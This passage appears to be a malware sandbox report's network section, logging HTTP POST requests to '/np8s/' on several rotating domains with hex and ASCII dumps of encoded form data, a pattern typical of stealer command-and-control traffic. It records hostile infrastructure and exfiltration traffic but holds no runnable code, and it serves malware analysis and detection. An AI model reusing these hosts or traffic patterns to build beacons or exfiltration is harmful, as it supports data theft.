zVB=~JLi7sExb4r3k9KzwFh8y9VCVYK6bYxuIV4x3meJHkm56FCZpSShivCjJ_v-uyPnDu3E5jxlRam5iIbJnKzcURsXos7aFciQRNLhoBCYD4tg6SvlKDtZw-OEwO42vAvCI-dgIldfynuMPhfb91hVF7TaXxT9dkmBLc(qe61F6Nlqrj4w0XCNfqkLsKAduYD7~8ozE7qeQgW2DLKRwCNu34j-A_IVrLx7FR(F1xbnShiDoggxgyrE53Nv0cGSwxN08A6WpTPpR-UQI9ZMCNKUAchXoi9x4JdpUmlgW666DfMAbggDqtukHeIxV7FLaLGJX9AJZ7P4Z-5GtLPYzAtVQOuTQ31Uxswslko3Wil9O6zoYA3IFMKQ2HITX7Dxa4p6WALrbE9rduhOpKLVLQ).
Source: global traffic HTTP traffic detected: POST /np8s/ HTTP/1.1Host: www.pdwfifi.comConnection: closeContent-Length: 36477Cache-Control: no-cacheOrigin: http://www.pdwfifi.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.pdwfifi.com/np8s/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 7a 56 42 3d 7e 4a 4c 69 37 70 38 64 43 4c 7e 78 67 64 48 54 39 53 78 6f 71 59 64 41 61 4a 7e 5f 47 70 63 77 66 33 41 62 71 58 4f 65 45 6c 65 76 72 46 32 34 69 78 69 35 69 71 7e 4f 64 63 4c 69 71 53 54 67 44 75 76 75 35 6a 39 6c 57 71 50 6e 69 70 4c 6a 6b 6f 72 64 51 78 73 6e 70 73 37 48 54 74 4f 39 52 4e 66 48 6f 42 62 41 44 4c 70 67 37 30 72 6c 62 55 35 65 30 65 4f 4f 39 75 4a 76 72 41 7a 66 49 2d 46 47 49 6b 68 66 79 58 79 4d 4f 43 48 61 31 55 68 61 43 72 54 66 53 78 54 6f 55 45 71 5f 4c 63 79 5f 65 37 6c 46 37 34 39 71 71 33 49 77 79 6c 71 4f 55 36 6b 43 6f 4b 41 41 71 64 61 6e 7e 38 30 4a 45 2d 47 6b 51 31 57 32 41 62 4b 51 36 78 73 64 77 76 33 70 47 5f 4d 69 72 4c 39 43 47 43 37 64 31 30 72 62 46 41 53 34 30 53 59 62 67 77 48 36 36 58 4e 72 67 4d 47 43 77 78 4e 41 38 41 37 46 70 53 28 70 52 38 30 51 4a 73 70 4d 4c 72 65 58 49 4d 68 57 6c 43 38 73 38 4a 52 73 55 6d 38 46 57 34 75 71 44 4e 49 41 62 30 38 44 73 50 32 6c 65 65 49 7a 57 37 46 6c 48 62 47 4d 58 39 41 72 5a 5f 61 6c 5a 4a 68 47 74 61 50 59 30 6c 78 56 53 65 75 54 65 58 31 57 37 4d 30 38 6c 6b 78 38 57 67 39 74 4f 74 44 6f 66 53 28 49 45 74 4b 51 79 33 49 54 44 4c 44 76 64 74 45 44 63 42 6a 61 4d 32 63 67 43 71 45 6d 69 61 4b 66 52 46 76 4c 34 59 63 63 6e 43 77 64 70 64 42 50 30 58 45 74 6b 75 58 56 6e 31 34 77 6f 71 7a 30 4f 56 70 39 76 69 59 55 6f 43 45 35 65 2d 57 5a 72 63 6c 4d 33 7a 75 4c 66 30 41 6d 32 39 52 5a 36 37 75 50 43 43 65 32 70 63 4d 38 58 69 73 5a 6d 32 72 43 42 38 42 51 38 31 6a 4e 37 70 68 43 58 35 35 33 50 6a 34 55 4a 4e 6e 50 37 47 4d 78 69 63 64 32 4f 67 76 39 32 68 4a 5a 7a 77 74 6d 42 4a 66 7a 59 4f 30 30 79 51 64 6a 70 36 28 42 47 31 30 6b 50 7a 61 65 76 48 77 52 70 5f 77 77 6a 2d 41 32 6f 34 47 72 33 39 38 74 68 36 50 2d 7a 42 44 2d 37 4f 70 79 34 7a 34 43 78 34 68 48 53 44 76 74 4f 54 6a 54 35 48 47 36 37 49 28 39 38 32 6d 78 33 37 72 6d 6b 67 36 6c 37 4a 78 75 7a 41 6d 31 4a 79 71 71 61 78 71 34 32 43 5a 6e 39 4e 6d 37 4a 7a 51 41 62 62 43 79 69 33 6d 77 28 31 6b 45 69 36 52 4e 52 6c 77 6d 5a 33 73 51 34 34 67 71 65 46 58 67 64 79 39 7a 55 71 41 56 49 64 6e 4e 39 55 47 5f 65 31 59 6d 50 55 68 53 77 48 44 64 47 47 39 6a 6f 64 65 4a 4b 6e 6c 38 71 74 44 6f 58 47 71 74 30 58 49 77 39 54 59 6e 65 49 32 75 61 61 6a 79 68 57 68 71 33 69 4a 33 32 49 33 6b 6d 58 46 52 51 52 46 65 71 67 46 69 58 35 56 64 37 73 43 30 6a 38 42 4a 63 54 6e 36 4c 77 28 54 6a 4f 35 51 57 78 5a 75 4b 57 56 32 64 6c 32 51 7a 41 7e 63 34 45 31 68 38 55 72 47 54 73 33 6c 54 76 42 31 53 4e 6f 54 6a 55 54 47 74 45 4f 77 63 76 44 70 66 30 36 47 50 52 64 63 63 35 4e 34 4c 66 57 65 35 32 35 51 63 54 57
Source: global traffic HTTP traffic detected: POST /np8s/ HTTP/1.1Host: www.68chengxinle.comConnection: closeContent-Length: 409Cache-Control: no-cacheOrigin: http://www.68chengxinle.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.68chengxinle.com/np8s/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 7a 56 42 3d 37 64 39 33 45 51 68 55 78 32 6d 4c 57 63 39 4b 5a 76 50 4b 4a 74 43 64 36 43 65 71 4d 54 35 6e 62 65 53 4d 4d 6d 7e 36 61 30 77 30 34 6f 37 71 4a 55 75 32 43 72 4f 2d 62 6c 39 52 57 47 56 76 78 4e 58 64 4e 78 7e 72 79 48 56 73 77 42 68 5a 52 76 42 53 45 4a 30 4c 6a 6c 45 53 6d 4c 67 5a 49 54 78 66 73 76 49 76 59 4c 4c 73 39 4e 35 4a 45 78 5a 69 58 6f 70 4b 6b 76 7a 4a 42 37 32 5a 59 66 7a 63 4b 39 66 39 74 31 38 75 4a 58 68 68 57 7a 79 44 42 4b 7e 42 57 49 6e 79 68 6f 73 36 49 52 56 34 75 34 43 63 36 45 58 48 6b 45 4b 54 50 45 31 67 51 33 4d 72 6f 41 50 37 6d 49 41 6e 44 79 38 77 46 35 6d 56 36 79 53 31 7a 67 4a 4e 30 63 42 67 54 38 31 4d 30 34 6f 42 39 62 38 50 53 7a 73 71 41 47 48 66 46 49 41 6c 4d 63 7a 4c 4b 36 33 70 30 69 61 6f 61 67 46 7a 31 41 4a 67 38 42 57 2d 4e 59 66 4a 6b 74 67 65 70 6e 65 72 6a 73 77 45 7a 6e 6d 76 55 66 33 34 75 39 48 76 34 45 4c 71 54 47 55 4b 6d 64 71 2d 69 47 73 76 28 4d 58 35 37 41 6a 31 6c 5f 53 66 77 34 7e 58 30 4b 45 79 43 74 50 50 43 62 57 33 37 75 64 77 4e 39 65 6d 46 52 4b 52 6f 42 64 38 28 6d 37 45 49 6b 63 6f 58 64 63 6f 46 79 67 42 28 77 51 57 62 43 7e 4d 30 55 4d 52 31 35 7e 35 32 56 72 67 6d 46 5a 77 39 49 78 51 51 6e 73 6c 52 46 63 32 61 77 29 2e 00 00 00 00 00 00 00 00 Data Ascii: zVB=7d93EQhUx2mLWc9KZvPKJtCd6CeqMT5nbeSMMm~6a0w04o7qJUu2CrO-bl9RWGVvxNXdNx~ryHVswBhZRvBSEJ0LjlESmLgZITxfsvIvYLLs9N5JExZiXopKkvzJB72ZYfzcK9f9t18uJXhhWzyDBK~BWInyhos6IRV4u4Cc6EXHkEKTPE1gQ3MroAP7mIAnDy8wF5mV6yS1zgJN0cBgT81M04oB9b8PSzsqAGHfFIAlMczLK63p0iaoagFz1AJg8BW-NYfJktgepnerjswEznmvUf34u9Hv4ELqTGUKmdq-iGsv(MX57Aj1l_Sfw4~X0KEyCtPPCbW37udwN9emFRKRoBd8(m7EIkcoXdcoFygB(wQWbC~M0UMR15~52VrgmFZw9IxQQnslRFc2aw).
Source: global traffic HTTP traffic detected: POST /np8s/ HTTP/1.1Host: www.68chengxinle.comConnection: closeContent-Length: 36477Cache-Control: no-cacheOrigin: http://www.68chengxinle.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.68chengxinle.com/np8s/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 7a 56 42 3d 37 64 39 33 45 56 68 38 75 57 4b 57 61 73 35 70 65 64 76 6b 52 4e 53 6c 34 79 4b 6c 4a 52 73 6e 52 4d 71 2d 53 54 43 4c 62 33 73 75 28 59 50 4c 44 31 6e 78 43 70 57 58 54 33 4a 56 53 6d 5a 6f 78 4e 66 43 4e 78 36 72 7a 48 74 38 33 67 78 5f 52 4e 35 52 48 70 31 2d 69 6c 45 62 73 70 55 30 49 54 6c 48 73 76 51 5f 59 62 66 73 28 6f 6c 4a 4e 51 5a 70 49 59 70 45 34 2d 65 4b 63 72 36 75 59 66 4c 55 4b 5f 4c 39 74 46 34 75 47 58 52 69 51 77 71 45 4d 36 7e 4f 44 34 6e 5a 34 34 67 49 49 52 52 61 75 39 36 63 36 79 76 48 6c 58 53 54 4a 31 31 6a 61 6e 4d 75 69 67 4f 6b 69 49 63 32 44 79 77 38 46 34 6a 69 39 43 57 31 79 51 4a 4f 34 71 42 6f 43 39 31 68 32 36 49 32 39 61 42 72 52 6e 4d 35 41 44 58 5f 56 65 74 52 43 61 65 73 4b 34 61 45 35 69 61 73 4f 77 45 76 31 41 49 66 38 42 58 64 4e 62 33 4a 6b 71 45 65 70 7a 7e 72 68 75 6f 4c 38 33 6d 71 51 66 33 79 34 4e 44 58 34 45 54 45 54 44 73 67 6d 71 69 2d 68 7a 77 76 34 75 76 2d 30 51 69 2d 69 5f 53 58 75 49 7e 75 30 4b 46 52 43 73 50 6c 43 72 36 33 36 39 46 77 4e 62 4b 6d 48 68 4b 52 6e 68 64 79 30 47 33 79 49 6c 30 73 58 63 41 43 46 42 4d 42 38 6a 6f 57 66 57 69 4d 34 45 4d 52 36 5a 28 64 6c 46 6d 66 71 79 78 4c 7e 70 30 6d 46 6e 64 41 53 6d 39 4f 4b 41 69 69 39 43 6a 49 67 32 57 48 79 64 7e 73 6b 31 7a 39 34 61 31 41 7a 48 73 4f 74 32 34 43 6f 58 46 4d 77 67 49 37 48 51 6c 33 6e 54 32 47 63 4f 62 77 4c 62 6b 41 66 2d 64 65 6f 77 53 30 70 5a 61 57 73 7a 7a 75 68 55 70 52 65 5a 4a 44 76 7a 56 5f 71 59 50 61 35 4f 6a 6b 49 72 54 6a 58 31 74 34 76 78 73 32 62 6a 44 6b 70 4a 69 62 70 30 48 56 6c 33 72 62 70 77 4f 62 38 4d 76 49 57 6c 73 4c 69 62 70 70 4d 70 73 55 5a 50 61 32 28 5a 73 68 41 73 53 43 38 6b 31 46 61 5f 33 66 4b 71 44 45 44 66 4f 72 43 54 75 73 71 48 53 35 35 32 4b 72 51 56 64 4e 34 2d 34 36 64 37 32 36 42 50 43 34 4e 42 62 37 6b 51 48 50 6d 47 67 52 74 58 79 36 61 47 6c 6d 75 47 7a 33 42 6f 67 4e 34 70 4c 57 67 47 6b 7a 62 78 46 34 51 76 52 57 6a 45 4d 55 44 6d 6a 75 6f 6f 32 4f 56 4b 33 58 5a 30 73 56 74 76 63 51 4f 6f 73 4a 64 68 68 38 78 2d 5a 34 48 65 69 76 73 5f 4a 43 50 71 51 53 65 4f 71 4a 67 34 61 73 69 2d 34 74 41 56 61 75 4d 39 77 61 79 57 42 63 55 52 51 63 77 69 72 35 54 4e 7e 4f 32 67 49 35 59 7a 72 30 39 58 28 65 6c 4d 49 44 61 38 31 31 68 72 5a 57 4f 52 59 6e 7a 31 66 64 45 70 73 50 52 6b 66 69 47 74 4b 54 77 6e 47 50 48 69 30 51 4c 70 55 51 39 54 6d 46 6d 6c 34 6d 6f 65 57 67 6a 69 45 69 66 34 5a 68 44 64 6c 36 44 46 6f 51 62 63 57 79 4c 4d 34 38 39 70 54 34 4c 63 32 6c 43 5a 50 78 6f 64 28 6d 61 5f 6a 72 78 4d 36 30 54 6b 31 36 55 78 4c 4b 67 66 58 31 69 4c 56 5f 31 4c
Source: global traffic HTTP traffic detected: POST /np8s/ HTTP/1.1Host: www.muddybootslife.comConnection: closeContent-Length: 409Cache-Control: no-cacheOrigin: http://www.muddybootslife.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.muddybootslife.com/np8s/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 7a 56 42 3d 32 54 44 61 55 45 6b 4d 73 4b 6e 54 31 57 74 58 38 37 36 31 49 55 56 2d 64 39 31 52 30 72 70 74 7e 47 53 71 30 4f 51 66 59 6a 6a 41 33 4f 41 66 4f 61 44 32 63 65 4c 44 56 5a 31 36 72 59 54 6c 6f 66 79 35 4e 45 7a 49 50 52 51 55 67 79 56 71 78 2d 66 68 71 66 76 49 30 32 6a 54 4b 52 62 61 39 66 44 32 33 4a 6a 6d 67 42 34 6f 52 39 52 37 6f 34 34 68 43 6c 4b 6a 36 55 51 4f 68 76 55 53 32 75 69 55 28 45 7e 68 59 45 4f 4a 42 47 58 52 44 45 6d 58 52 34 67 47 65 65 72 36 79 78 36 5a 76 4b 62 42 7e 7a 53 51 6e 79 32 5f 78 41 5a 73 43 36 6b 71 35 36 71 2d 4a 5a 43 68 6b 78 6d 6b 4f 76 62 44 6e 42 6d 30 46 37 34 6d 30 75 30 35 53 63 6c 61 39 34 55 49 76 4d 6c 76 64 47 62 30 46 68 41 79 5a 6e 4c 5a 68 5f 4c 6e 4a 6c 45 35 6f 48 45 38 79 42 69 36 55 73 6d 38 4a 79 6a 58 66 46 57 6b 78 51 6e 43 59 6e 67 67 62 61 7a 4e 53 58 4b 59 54 69 6e 48 63 6e 64 62 4f 62 61 4d 65 6a 54 6f 63 54 66 6a 4d 64 77 70 43 77 6e 71 37 74 4b 76 53 46 57 4e 4c 33 59 2d 53 6a 6b 66 36 71 71 46 30 33 4d 43 71 31 59 5f 79 61 47 58 55 30 4b 4e 49 4c 6a 78 44 73 55 32 57 67 70 2d 42 6b 68 76 48 77 54 43 56 59 4b 78 44 2d 7a 4d 45 6c 63 4d 6c 39 53 79 72 48 42 35 78 38 59 51 36 34 28 77 63 74 58 70 28 65 49 34 6e 59 4d 6c 6e 77 29 2e 00 00 00 00 00 00 00 00 Data Ascii: zVB=2TDaUEkMsKnT1WtX8761IUV-d91R0rpt~GSq0OQfYjjA3OAfOaD2ceLDVZ16rYTlofy5NEzIPRQUgyVqx-fhqfvI02jTKRba9fD23JjmgB4oR9R7o44hClKj6UQOhvUS2uiU(E~hYEOJBGXRDEmXR4gGeer6yx6ZvKbB~zSQny2_xAZsC6kq56q-JZChkxmkOvbDnBm0F74m0u05Scla94UIvMlvdGb0FhAyZnLZh_LnJlE5oHE8yBi6Usm8JyjXfFWkxQnCYnggbazNSXKYTinHcndbObaMejTocTfjMdwpCwnq7tKvSFWNL3Y-Sjkf6qqF03MCq1Y_yaGXU0KNILjxDsU2Wgp-BkhvHwTCVYKxD-zMElcMl9SyrHB5x8YQ64(wctXp(eI4nYMlnw).
Source: global traffic HTTP traffic detected: POST /np8s/ HTTP/1.1Host: www.muddybootslife.comConnection: closeContent-Length: 36477Cache-Control: no-cacheOrigin: http://www.muddybootslife.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.muddybootslife.com/np8s/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 7a 56 42 3d 32 54 44 61 55 45 49 65 78 4c 62 77 37 6d 68 30 37 49 4b 66 44 46 46 38 4e 64 67 66 77 61 31 79 37 7a 32 41 36 76 68 2d 62 6d 57 66 7a 2d 64 4e 4b 64 58 75 63 62 32 5a 59 4c 42 2d 73 34 58 6d 6f 66 71 62 4e 45 6e 49 4f 51 34 45 6e 52 63 39 78 62 7a 6d 72 5f 76 65 31 32 6a 61 4f 55 79 49 39 66 48 55 33 4a 36 35 67 79 38 6f 51 62 64 37 28 76 6b 37 47 31 4b 6c 35 55 68 56 38 66 49 31 32 75 4c 53 28 42 47 68 59 30 4b 4a 48 6e 6e 53 53 33 7e 57 56 6f 67 66 50 75 72 6f 39 52 6e 71 76 4b 50 5a 7e 33 57 51 6b 45 4f 5f 79 77 35 73 57 64 51 70 74 36 71 33 59 4a 43 6f 7a 68 71 49 4f 76 33 45 6e 44 4b 4f 46 4f 59 6d 31 65 30 34 57 4e 73 35 36 70 55 54 6a 74 68 59 64 47 58 64 46 77 4d 36 5a 69 37 31 70 74 69 43 56 54 51 44 6f 44 67 47 7e 42 69 41 63 4d 6d 6e 4a 79 6a 7a 66 46 58 75 78 54 50 43 59 67 63 67 61 4b 6a 4e 62 78 7e 66 62 79 6e 43 4c 33 64 46 66 72 47 30 65 6a 4c 43 63 57 75 6b 4d 4e 4d 70 41 68 33 71 7a 76 69 6f 65 56 58 47 4d 33 5a 74 59 44 6b 4d 36 71 71 33 30 7a 59 53 70 43 41 5f 77 50 7e 58 58 58 69 4e 62 4c 6a 78 66 38 55 30 63 41 31 75 42 6b 70 72 48 78 6a 38 56 72 6d 78 43 6f 6e 4d 46 45 63 4d 69 4e 53 79 79 58 41 58 31 65 46 75 34 5a 58 45 51 50 47 4f 6d 39 6c 62 7a 73 4e 4c 35 44 67 37 53 54 77 70 55 55 6f 46 41 4c 63 71 6c 49 35 5a 6f 38 4e 78 45 34 68 72 63 30 61 70 6c 59 5a 62 37 53 74 51 39 53 77 76 61 63 75 6b 28 70 73 2d 55 76 71 50 35 61 64 70 59 66 45 4e 66 76 5a 36 6c 64 4d 6f 5a 6c 28 78 34 45 55 4d 6e 38 44 4f 4a 72 77 33 7a 67 72 5a 43 48 6a 53 53 52 70 4e 53 52 45 39 71 52 31 77 37 71 46 45 4d 58 59 79 50 2d 36 54 48 4e 72 55 43 6c 57 63 30 53 63 45 28 61 4d 75 41 75 55 49 69 6f 4f 4f 78 4d 6d 62 50 6d 75 32 55 72 5a 54 49 41 4d 31 59 4e 69 58 34 45 44 47 37 48 53 36 62 63 39 30 73 38 53 68 50 30 50 42 62 4b 6f 4a 6f 6d 54 6f 36 76 39 46 78 6c 6c 66 4e 57 31 42 30 55 61 72 58 30 34 59 61 6e 7a 4e 39 57 7a 37 52 72 56 4f 59 30 68 68 77 36 74 46 79 6f 50 44 4b 45 4e 62 4c 65 75 59 47 5a 72 47 47 75 58 42 7e 4f 76 49 48 68 6d 75 54 4a 36 5a 6e 7a 44 57 67 73 6a 32 6f 6c 62 50 4d 47 54 4e 75 74 6b 6d 6c 42 58 33 67 42 42 52 56 4f 39 67 42 45 67 6a 37 70 4b 71 74 46 57 30 33 2d 34 33 63 70 57 2d 70 77 45 4a 63 33 58 59 64 44 53 46 7a 5a 32 47 6b 53 6f 76 43 44 65 48 74 65 6d 56 39 4a 30 5a 61 6c 41 6b 37 4e 6d 37 63 6c 43 62 79 48 73 76 6d 65 5a 47 47 45 77 42 30 39 42 31 38 71 37 33 6d 30 57 48 69 6d 4d 6c 71 4d 39 70 30 57 41 50 41 68 49 79 75 46 50 44 53 43 50 4f 4c 70 4b 7a 73 57 65 45 34 6b 43 74 69 54 51 4c 4f 4b 72 5f 5a 37 48 62 65 50 39 59 79 35 75 49 4f 74 36 5a 69 4d 73 74 51 4c 34 4c 28 31 61 77
Source: global traffic HTTP traffic detected: POST /np8s/ HTTP/1.1Host: www.84866.xyzConnection: closeContent-Length: 409Cache-Control: no-cacheOrigin: http://www.84866.xyzUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.84866.xyz/np8s/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 7a 56 42 3d 45 4e 4a 2d 57 51 48 51 4a 48 42 43 28 31 39 6e 55 34 66 69 76 50 4d 42 45 30 50 56 32 61 7a 4c 34 5f 47 4a 4f 42 47 65 53 4a 6f 6b 71 53 36 42 64 2d 7a 54 50 4f 45 5f 30 6f 67 4e 56 69 76 31 44 32 52 43 5a 67 55 46 34 67 76 31 52 71 47 31 6b 54 56 53 68 77 53 79 44 58 6d 32 76 56 67 5f 6c 5f 35 53 57 6b 58 6a 68 62 73 6f 7e 52 54 6d 47 44 4a 56 75 4d 48 68 7e 6a 36 6e 65 2d 34 64 47 4c 49 36 62 54 4a 42 52 69 61 5f 41 5a 68 78 64 6a 54 68 73 58 53 61 34 61 4f 56 46 62 68 70 78 44 52 58 61 56 28 39 4f 68 7e 76 62 47 43 46 31 50 6d 68 78 56 6a 6b 4c 4b 4a 45 6f 68 77 32 75 56 73 78 6a 57 6a 56 67 79 30 6d 46 6a 61 49 44 6c 6c 48 6f 32 42 33 31 69 4f 44 6a 50 62 38 69 38 53 49 47 48 4e 51 58 55 69 54 75 43 78 53 46 30 46 73 46 77 44 74 6d 39 48 68 75 52 62 6b 55 59 6d 53 47 6e 36 65 69 32 55 31 69 73 57 38 78 41 41 5a 74 50 4a 73 48 39 64 41 30 48 6f 6d 7e 6a 34 45 37 54 6f 72 62 2d 37 6a 73 74 69 75 30 4f 7a 55 64 79 6d 53 64 74 6a 7a 4b 66 32 32 6f 39 44 44 51 4f 35 4f 35 53 68 58 58 4d 43 31 35 51 41 72 51 67 45 4e 74 34 56 66 6e 58 30 46 65 7a 52 59 62 38 37 54 4f 52 72 48 6c 76 28 4f 31 4c 77 2d 62 38 75 48 38 52 4f 62 59 6b 6c 35 59 4a 72 50 70 44 51 48 41 43 72 37 6c 45 4a 44 31 67 29 2e 00 00 00 00 00 00 00 00 Data Ascii: zVB=ENJ-WQHQJHBC(19nU4fivPMBE0PV2azL4_GJOBGeSJokqS6Bd-zTPOE_0ogNViv1D2RCZgUF4gv1RqG1kTVShwSyDXm2vVg_l_5SWkXjhbso~RTmGDJVuMHh~j6ne-4dGLI6bTJBRia_AZhxdjThsXSa4aOVFbhpxDRXaV(9Oh~vbGCF1PmhxVjkLKJEohw2uVsxjWjVgy0mFjaIDllHo2B31iODjPb8i8SIGHNQXUiTuCxSF0FsFwDtm9HhuRbkUYmSGn6ei2U1isW8xAAZtPJsH9dA0Hom~j4E7Torb-7jstiu0OzUdymSdtjzKf22o9DDQO5O5ShXXMC15QArQgENt4VfnX0FezRYb87TORrHlv(O1Lw-b8uH8RObYkl5YJrPpDQHACr7lEJD1g).
Source: global traffic HTTP traffic detected: POST /np8s/ HTTP/1.1Host: www.84866.xyzConnection: closeContent-Length: 36477Cache-Control: no-cacheOrigin: http://www.84866.xyzUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.84866.xyz/np8s/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 7a 56 42 3d 45 4e 4a 2d 57 53 44 38 55 48 74 62 7a 46 78 45 58 4b 76 32 67 65 38 44 44 45 4c 73 6f 4f 72 55 72 39 7a 34 41 67 33 75 54 4d 4e 67 38 69 6d 73 66 4a 7e 4d 50 50 30 53 67 74 51 42 66 53 7a 30 44 79 30 49 5a 67 41 46 35 68 48 6c 52 4e 4c 67 6c 77 39 64 68 51 53 4b 43 58 6d 7a 72 51 34 65 6c 5f 4e 6b 57 6b 66 7a 68 4b 51 6f 34 7a 72 6d 52 55 64 65 6a 4d 47 6f 39 6a 71 37 52 65 38 36 47 50 64 76 62 58 42 42 52 53 6d 5f 42 35 39 77 4d 79 54 6d 6c 6e 53 54 39 61 4f 2d 4d 37 74 62 78 43 6c 31 61 51 48 39 4f 54 4b 76 59 79 32 46 79 34 79 69 37 46 6a 6c 41 71 4a 46 73 68 4e 6f 75 56 67 39 6a 58 6d 69 67 44 41 6d 55 44 61 4e 55 69 35 2d 69 48 42 5a 33 69 71 30 6a 50 47 6f 6c 74 4f 41 47 47 68 34 55 6c 79 6f 68 41 49 33 46 33 70 43 48 51 44 70 68 4e 48 2d 75 52 61 5a 55 59 6d 73 47 6e 71 65 69 78 67 31 6a 38 47 38 6d 57 73 65 68 66 49 6d 57 74 64 43 6a 33 6c 31 7e 6a 67 36 37 57 68 30 62 4a 4c 6a 74 39 65 75 32 73 72 58 56 69 6e 5a 63 74 6a 72 45 5f 32 35 6f 39 44 74 51 4e 68 65 35 6c 4a 58 56 64 43 31 37 44 34 72 57 51 45 4e 30 49 56 6e 6f 33 34 56 65 33 30 52 62 35 66 70 4f 41 6a 48 69 35 7a 4f 31 71 77 2d 63 4d 75 48 33 78 50 66 54 57 34 58 54 35 6e 50 69 43 78 69 57 57 4f 73 6d 67 41 6b 72 46 75 38 54 46 55 35 4f 68 41 36 4f 44 6e 32 73 67 55 64 45 6f 51 32 73 73 30 68 75 42 42 47 32 31 51 57 73 68 37 6b 7e 45 43 36 44 4d 73 76 7a 32 75 48 4f 39 45 4e 68 38 4f 56 4b 30 36 68 32 55 63 38 4c 59 43 6f 75 66 32 33 78 52 33 45 48 6d 65 34 4f 33 47 57 36 58 6a 45 59 4e 5a 34 5a 42 66 4d 52 42 32 42 6b 38 4e 5a 31 4b 28 67 30 6f 46 7a 37 39 48 68 65 30 39 66 37 41 33 38 66 36 31 76 50 53 54 64 59 57 6e 41 4a 74 33 42 4e 66 54 5a 35 67 69 57 57 54 68 75 79 69 76 4c 77 4a 69 7a 6c 37 77 30 73 78 32 55 55 72 75 39 67 67 74 59 59 44 53 46 56 43 6a 78 48 44 65 42 36 42 4a 41 46 51 6a 49 72 6e 38 5f 4f 4c 71 64 66 58 74 67 48 62 42 39 35 48 74 4a 51 34 54 42 4c 39 4a 43 54 7a 70 35 56 74 4a 42 49 4e 37 4a 66 4d 59 74 54 41 47 38 74 63 6e 35 63 77 42 30 70 73 62 53 64 4a 6c 6f 28 35 62 71 44 36 7e 6c 79 43 28 55 37 51 49 53 6f 45 67 55 31 5f 39 37 45 37 71 44 45 31 37 38 39 53 41 69 57 32 67 5a 61 31 64 71 72 6e 77 65 43 36 49 76 44 41 7e 4e 75 41 42 43 37 72 44 47 32 59 36 59 51 50 48 31 4a 63 4a 30 52 4e 42 33 66 6e 58 46 62 42 47 73 55 78 6f 36 46 65 33 64 74 53 61 5f 50 73 4a 52 67 30 36 48 5a 39 6b 5a 67 46 4d 6c 5a 63 47 37 31 69 61 4f 33 7a 66 74 57 68 38 4f 6c 57 69 46 69 4a 38 70 41 68 4e 4a 72 63 4b 2d 6f 41 67 77 38 32 61 39 46 4e 57 77 37 45 47 68 49 47 64 6a 42 55 4c 65 49 44 4b 35 6c 34 51 57 4c 62 62 30 6e 79 63 61 46 64 78 5a 73 42 36 64 6a 57 68 2d 55
Source: global traffic HTTP traffic detected: POST /np8s/ HTTP/1.1Host: www.localbloom.onlineConnection: closeContent-Length: 409Cache-Control: no-cacheOrigin: http://www.localbloom.onlineUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.localbloom.online/np8s/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 7a 56 42 3d 68 62 51 6a 45 64 37 4f 55 73 31 78 6c 61 46 55 36 51 47 50 31 73 33 44 33 6f 39 35 66 51 5a 58 33 30 42 61 73 6c 52 6c 74 6f 63 45 41 68 31 75 4d 67 6f 45 50 46 55 61 4f 4b 4d 63 6b 6a 4e 79 44 6b 7e 62 44 79 68 4f 66 59 51 73 46 65 52 36 78 57 55 33 43 52 39 57 46 51 68 75 67 6a 48 37 6b 68 36 55 62 74 78 5a 54 32 52 67 4c 51 75 63 59 53 4f 58 4a 35 55 75 46 58 69 6a 28 67 61 63 73 4c 59 4a 4a 49 59 36 4e 55 34 4f 54 74 6c 53 39 35 77 70 36 69 55 67 64 4d 6c 77 4b 46 64 77 79 73 63 50 4c 50 4f 39 38 5f 50 67 70 61 33 56 59 67 57 6d 5a 6c 46 41 6f 4f 78 76 28 6c 6a 4b 36 38 51 4b 6a 5f 54 78 43 66 49 65 61 42 71 6c 66 55 59 56 35 38 54 4b 47 43 30 4d 6f 52 71 49 53 70 72 56 36 46 54 77 42 57 69 44 35 38 42 4f 44 61 43 4d 7e 6c 68 45 6f 63 45 7a 46 66 7a 43 54 63 58 66 6c 4e 4f 71 34 4e 61 74 7a 44 51 48 43 43 73 41 72 44 34 30 49 34 6a 6c 65 56 66 58 79 37 58 53 7a 33 4a 72 74 4e 57 33 57 61 54 39 76 59 69 78 72 48 31 73 4d 44 36 7a 6a 45 56 59 54 51 6c 51 37 63 4b 47 49 6f 67 68 64 67 4b 4d 6b 41 68 4c 6c 51 6c 69 72 34 49 71 7e 30 30 66 4e 41 43 63 71 37 28 42 78 6c 56 4e 43 33 32 49 34 71 6f 55 75 74 44 68 6b 51 36 62 4d 7a 66 78 4c 65 44 46 43 35 67 79 70 42 6c 57 53 4c 44 38 70 77 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 